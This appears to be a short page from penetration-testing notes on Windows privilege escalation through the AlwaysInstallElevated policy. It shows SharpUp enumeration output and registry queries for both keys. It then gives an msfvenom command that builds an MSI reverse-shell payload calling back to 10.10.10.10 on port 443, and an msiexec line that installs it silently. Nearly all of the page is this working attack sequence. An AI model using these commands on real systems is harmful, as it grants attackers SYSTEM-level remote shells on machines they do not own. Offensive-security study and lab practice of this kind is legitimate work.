AutoInstall Elevate

Seatbelt

C:\Tools\SharpUp\SharpUp\bin\Debug\SharpUp.exe

=== AlwaysInstallElevated Registry Keys ===

  HKLM:    1
  HKCU:    1

Registry

reg query HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Installer
reg query HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Installer

Enable set value to 0x1

To be able to exploit this vulnerability, both should be set. Otherwise, exploitation will not be possible.

msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.10.10 LPORT=443 -f msi -o malicious.msi
C:\> msiexec /quiet /qn /i C:\Windows\Temp\malicious.msi
PreviousUAC BypassNextUnquoted Service Paths

Last updated